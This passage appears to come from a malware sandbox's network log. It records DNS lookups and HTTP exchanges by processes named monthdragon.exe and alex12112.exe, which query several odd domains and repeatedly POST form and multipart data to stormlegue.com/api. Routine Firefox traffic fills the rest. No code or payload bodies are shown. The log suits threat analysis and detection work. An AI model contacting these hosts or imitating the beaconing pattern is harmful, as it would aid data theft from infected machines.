                                                                                              Last-Modified: Sun, 16 Feb 2025 19:42:58 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b23fc2-56400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              naturewsounds.help
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              naturewsounds.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OdFmJQl5t%2Frlrz4xIanefo5JTpK6D58pgo7XGaPZYQYq7TQyr6tIovJK54jqqdRZBcfe3CV2T6a8VzJHX1njcHz6W1Nnu08kHLsqtzgc2n4gvdRJ7IOllGLTxTerHTH8xQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69599dad0339-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ec072r3pldmgj5k4nmv1cgrkk9; expires=Fri, 21 Feb 2025 00:34:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UtZMHQDURj%2BRI5BaPVjqvzNcnANBzH9s%2FAc3zktWAfAqsk6P1bkhmA%2FSSnMHKUX5kMWVysTuEq3l6XoKlBznchsb0W4RgZLb8Anlp5FMXvd%2FgnA797TRsLBKhCj1yTlN5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6959fe2b0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44935&min_rtt=42007&rtt_var=13822&sent=14&recv=10&lost=0&retrans=0&sent_bytes=8830&recv_bytes=1063&delivery_rate=217353&cwnd=253&unsent_bytes=0&cid=3c627abbafc3fa93&ts=308&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=PG058E5YD88Y3RMW7
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1657
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=fqh0qa4p1suhsdu3v4nkkvm8es; expires=Fri, 21 Feb 2025 00:34:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcGC7WFzLVkHjq7yIR%2B9aS8oYdFo9tJvR9k4%2Fot0sUuGd6uPGLHChisQ5R5OarUKVPzHgHJxRa9OWBRrcLlYa1x%2F6ZgyK4BdQqb%2BgXP6hvvVVdEIyK5ecE2kis%2BZSvvvGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a695b480b0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44572&min_rtt=41998&rtt_var=11093&sent=17&recv=14&lost=0&retrans=0&sent_bytes=10004&recv_bytes=3145&delivery_rate=217353&cwnd=253&unsent_bytes=0&cid=3c627abbafc3fa93&ts=507&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L4V30WR81YSD
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1085
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=l48aj7t5ao1ep01ndug0u8vk4e; expires=Fri, 21 Feb 2025 00:34:33 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kA9%2FrP%2F%2BTnPKwuchxPYxT2l7f5uNgh7NH9cnK%2FssbU02BwKSfiF30zbFOp%2FdSHPp%2BDHk5LEWU%2Fe15II17QRfD3qCECbDkuwT49jPpZdot13uJp2KQPZHyFGa9bcwXovMCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a695d7f1c94ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42791&min_rtt=41961&rtt_var=9360&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1779&delivery_rate=93174&cwnd=253&unsent_bytes=0&cid=82925ff5c1525347&ts=332&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=6s7s90iaco6evu9dmrgqpobchp; expires=Fri, 21 Feb 2025 00:34:33 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLmPK84vD%2FmStFQHgyDA5hrWxdXt7rKiSriLCKHiXT7%2Bviqc5yd38XK85hvM5pImW%2FQNTmPGkwe8MNB%2Fdb5Nh1R8IyWlL5oveWrXKkhShtLX8vEev7EEqIiUbwFvfqXPzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a696018db0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42744&min_rtt=42095&rtt_var=9739&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=770&delivery_rate=90286&cwnd=253&unsent_bytes=0&cid=407849f11aff5ae6&ts=275&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              location.services.mozilla.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              location.services.mozilla.com
                                                                                              IN A
                                                                                              Response
                                                                                              location.services.mozilla.com
                                                                                              IN CNAME
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              35.190.72.216
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN A
                                                                                              35.244.181.201
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              35.190.72.216
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              prod.balrog.prod.cloudops.mozgcp.net
                                                                                              IN AAAA
                                                                                              2600:1901:0:5133::
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.classify-client.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              play.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              play.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              play.google.com
                                                                                              IN A
                                                                                              142.250.178.14
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fxreshideas.tech
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fxreshideas.tech
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-gb
                                                                                              POST
                                                                                              https://play.google.com/log?hasfast=true&authuser=0&format=json
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.178.14:443
                                                                                              Request
                                                                                              POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                                                                                              host: play.google.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: */*
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              referer: https://consent.youtube.com/
                                                                                              content-type: text/plain;charset=UTF-8
                                                                                              content-length: 731
                                                                                              origin: https://consent.youtube.com
                                                                                              sec-fetch-dest: empty
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-site: cross-site
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              play.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              play.google.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              play.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:815::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              redirector.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              redirector.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              redirector.gvt1.com
                                                                                              IN A
                                                                                              142.250.187.206
                                                                                            • flag-us
                                                                                              DNS
                                                                                              ciscobinary.openh264.org
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              ciscobinary.openh264.org
                                                                                              IN A
                                                                                              Response
                                                                                              ciscobinary.openh264.org
                                                                                              IN CNAME
                                                                                              a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                                                                              a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                                                                              IN CNAME
                                                                                              a17.rackcdn.com
                                                                                              a17.rackcdn.com
                                                                                              IN CNAME
                                                                                              a17.rackcdn.com.mdc.edgesuite.net
                                                                                              a17.rackcdn.com.mdc.edgesuite.net
                                                                                              IN CNAME
                                                                                              a19.dscg10.akamai.net
                                                                                              a19.dscg10.akamai.net
                                                                                              IN A
                                                                                              2.18.121.79
                                                                                              a19.dscg10.akamai.net
                                                                                              IN A
                                                                                              2.18.121.72
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shiningrstars.help
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shiningrstars.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.187.206:443
                                                                                              Request
                                                                                              GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                                                                                              host: redirector.gvt1.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: */*
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              redirector.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              redirector.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              redirector.gvt1.com
                                                                                              IN A
                                                                                              142.250.187.206
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              2.18.121.79:80
                                                                                              Request
                                                                                              GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                                                                                              Host: ciscobinary.openh264.org
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              Accept: */*
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: keep-alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Last-Modified: Fri, 07 Feb 2025 06:41:47 GMT
                                                                                              ETag: 09372174e83dbbf696ee732fd2e875bb
                                                                                              Content-Length: 491284
                                                                                              Accept-Ranges: bytes
                                                                                              X-Timestamp: 1738910506.39727
                                                                                              Content-Type: application/zip
                                                                                              X-Trans-Id: tx590d7becdb574cad82cd8-0067a84dbedfw1
                                                                                              Cache-Control: public, max-age=30445
                                                                                              Expires: Thu, 20 Feb 2025 09:02:06 GMT
                                                                                              Date: Thu, 20 Feb 2025 00:34:41 GMT
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              a19.dscg10.akamai.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              a19.dscg10.akamai.net
                                                                                              IN A
                                                                                              Response
                                                                                              a19.dscg10.akamai.net
                                                                                              IN A
                                                                                              2.18.121.72
                                                                                              a19.dscg10.akamai.net
                                                                                              IN A
                                                                                              2.18.121.79
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mercharena.biz
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mercharena.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              redirector.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              redirector.gvt1.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              redirector.gvt1.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81f::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              generalmills.pro
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              generalmills.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              a19.dscg10.akamai.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              a19.dscg10.akamai.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              a19.dscg10.akamai.net
                                                                                              IN AAAA
                                                                                              2a02:26f0:1700:f::1737:a1b9
                                                                                              a19.dscg10.akamai.net
                                                                                              IN AAAA
                                                                                              2a02:26f0:1700:f::1737:a1d3
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:41 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQdkV8MvALGrDsd3PSJ%2F8U1hwoyMdVoO4oqUG7bHmG7hd%2B8fp%2BDbe7XCmxlTXp3%2B8F7CEL82PZh3HcbQQCvZayETSXuAYPkD8dLeGBLygvRLDR1ITROf6r5mBachZqH2yA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6992dcd194ab-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 46
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=0lmvqblm8768bg33i986lj84hl; expires=Fri, 21 Feb 2025 00:34:41 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rjerjtpr5n%2FpxdvS%2BaRSnT7J6sjJ%2Bpds%2Fmx0mhwjFjJyOBcvU%2F0n8Yv6b1pNPNL%2B4QNBx28Gc7xRI2VBW%2B5vji4UG2IW1fjL32gNtNOPhiq%2Bk2wvgjxVXpU5%2F9Xb%2F%2FG2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69932cff94ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43143&min_rtt=41674&rtt_var=6787&sent=14&recv=11&lost=0&retrans=0&sent_bytes=8837&recv_bytes=1056&delivery_rate=217966&cwnd=255&unsent_bytes=0&cid=ddd0d43cb39b9a7f&ts=387&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=BOIR7NS2C8XV1N
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1634
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=5bekn3pl6ndtf30iefmsc60rtp; expires=Fri, 21 Feb 2025 00:34:42 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0C4DXcsmXMSk7vdyBPyHl3AViK0xfxLSdcCZkfhvkKJIpdEdofxfHzPpM4YjRox%2FZZoHXMPhzNu3eur3waUZeiysHIRqkgnohJtZnbe%2FNeHOYogknrC44QyYt1SGtK71Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69951e6494ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43145&min_rtt=41674&rtt_var=5094&sent=17&recv=15&lost=0&retrans=0&sent_bytes=10024&recv_bytes=3112&delivery_rate=217966&cwnd=255&unsent_bytes=0&cid=ddd0d43cb39b9a7f&ts=607&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              r2---sn-aigl6ns6.gvt1.com
                                                                                              IN CNAME
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              74.125.105.7
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://r2---sn-aigl6ns6.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              74.125.105.7:443
                                                                                              Request
                                                                                              GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com HTTP/1.1
                                                                                              Host: r2---sn-aigl6ns6.gvt1.com
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              Accept: */*
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Connection: keep-alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Accept-Ranges: bytes
                                                                                              Cache-Control: public,max-age=86400
                                                                                              Content-Disposition: attachment
                                                                                              Content-Length: 14485862
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Type: application/zip
                                                                                              Etag: "1d3918c"
                                                                                              Server: downloads
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Xss-Protection: 0
                                                                                              Date: Thu, 20 Feb 2025 00:34:41 GMT
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                                                                                              Connection: keep-alive
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                                                                              Vary: Origin
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              Response
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN A
                                                                                              74.125.105.7
                                                                                            • flag-us
                                                                                              DNS
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN AAAA
                                                                                              Response
